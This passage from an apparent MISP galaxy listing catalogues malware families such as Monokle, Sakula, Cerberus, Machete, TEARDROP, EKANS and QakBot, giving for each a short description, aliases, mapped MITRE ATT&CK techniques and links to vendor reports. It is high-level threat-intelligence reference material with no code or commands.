uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 4762. Table References
Links
https://attack.mitre.org/software/S0604
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf [https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf ]
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf [https://dragos.com/blog/crashoverride/CrashOverride-01.pdf ]
https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf [https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf ]

BBK - S0470

[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="BBK - S0470"

BBK - S0470 is also known as:

View relationships graph

BBK - S0470 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 4763. Table References
Links
https://attack.mitre.org/software/S0470
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

Monokle - S0407

[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)

The tag is: misp-galaxy:mitre-malware="Monokle - S0407"

Monokle - S0407 is also known as:

Monokle

View relationships graph

Monokle - S0407 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Call Control - T1616" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hooking - T1617" with estimative-language:likelihood-probability="almost-certain"

Table 4764. Table References
Links
https://attack.mitre.org/software/S0407
https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

Sakula - S0074

[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)

The tag is: misp-galaxy:mitre-malware="Sakula - S0074"

Sakula - S0074 is also known as:

Sakula
Sakurel
VIPER

View relationships graph

Sakula - S0074 has relationships with:

similar: misp-galaxy:rat="Sakula" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 4765. Table References
Links
https://attack.mitre.org/software/S0074
http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/

Cerberus - S0480

[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)

The tag is: misp-galaxy:mitre-malware="Cerberus - S0480"

Cerberus - S0480 is also known as:

Cerberus

View relationships graph

Cerberus - S0480 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4766. Table References
Links
https://attack.mitre.org/software/S0480
https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

PinchDuke - S0048

[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="PinchDuke - S0048"

PinchDuke - S0048 is also known as:

PinchDuke

View relationships graph

PinchDuke - S0048 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 4767. Table References
Links
https://attack.mitre.org/software/S0048
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

GeminiDuke - S0049

[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="GeminiDuke - S0049"

GeminiDuke - S0049 is also known as:

GeminiDuke

View relationships graph

GeminiDuke - S0049 has relationships with:

similar: misp-galaxy:tool="GeminiDuke" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4768. Table References
Links
https://attack.mitre.org/software/S0049
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Machete - S0409

[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)

The tag is: misp-galaxy:mitre-malware="Machete - S0409"

Machete - S0409 is also known as:

Machete
Pyark

View relationships graph

Machete - S0409 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4769. Table References
Links
https://attack.mitre.org/software/S0409
https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
https://securelist.com/el-machete/66108/
https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

DoubleAgent - S0550

[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="DoubleAgent - S0550"

DoubleAgent - S0550 is also known as:

DoubleAgent

View relationships graph

DoubleAgent - S0550 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4770. Table References
Links
https://attack.mitre.org/software/S0550
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

RARSTONE - S0055

[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)

The tag is: misp-galaxy:mitre-malware="RARSTONE - S0055"

RARSTONE - S0055 is also known as:

RARSTONE

View relationships graph

RARSTONE - S0055 has relationships with:

similar: misp-galaxy:tool="RARSTONE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4771. Table References
Links
https://attack.mitre.org/software/S0055
http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/

TEARDROP - S0560

[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="TEARDROP - S0560"

TEARDROP - S0560 is also known as:

TEARDROP

View relationships graph

TEARDROP - S0560 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 4772. Table References
Links
https://attack.mitre.org/software/S0560
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

EKANS - S0605

[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)

The tag is: misp-galaxy:mitre-malware="EKANS - S0605"

EKANS - S0605 is also known as:

EKANS
SNAKEHOSE

View relationships graph

EKANS - S0605 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4773. Table References
Links
https://attack.mitre.org/software/S0605
https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/
https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/
https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

ViperRAT - S0506

[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT)

The tag is: misp-galaxy:mitre-malware="ViperRAT - S0506"

ViperRAT - S0506 is also known as:

ViperRAT

View relationships graph

ViperRAT - S0506 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 4774. Table References
Links
https://attack.mitre.org/software/S0506
https://blog.lookout.com/viperrat-mobile-apt

QakBot - S0650

[QakBot](https://attack.mitre.org/software/S0650) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://attack.mitre.org/software/S0650) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://attack.mitre.org/software/S0654) and [Egregor](https://attack.mitre.org/software/S0554).(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)

The tag is: misp-galaxy:mitre-malware="QakBot - S0650"

QakBot - S0650 is also known as:

QakBot
Pinkslipbot
QuackBot
QBot

View relationships graph

QakBot - S0650 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
